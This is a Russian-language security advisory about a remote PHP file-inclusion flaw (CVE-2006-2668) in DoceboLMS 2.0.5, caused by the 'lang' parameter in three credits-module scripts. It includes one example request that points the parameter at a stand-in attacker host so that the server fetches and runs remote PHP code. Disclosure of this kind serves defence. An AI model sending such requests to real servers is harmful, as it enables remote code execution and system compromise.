PHP-инклюдинг в DoceboLMS

Дата публикации:
31.05.2006
Дата изменения:
17.10.2006
Всего просмотров:
2290
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-2668
CVE-2006-6857
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
DoceboLMS 2.x
Уязвимые версии: DoceboLMS 2.0.5, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "lang" в сценариях modules/credits/help.php, /modules/credits/business.php и /modules/credits/credits.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://victim/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?

URL производителя: www.docebolms.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: DoceboLMS <= 2.0.5 (help.php) Remote File Include Vulnerability

или введите имя

CAPTCHA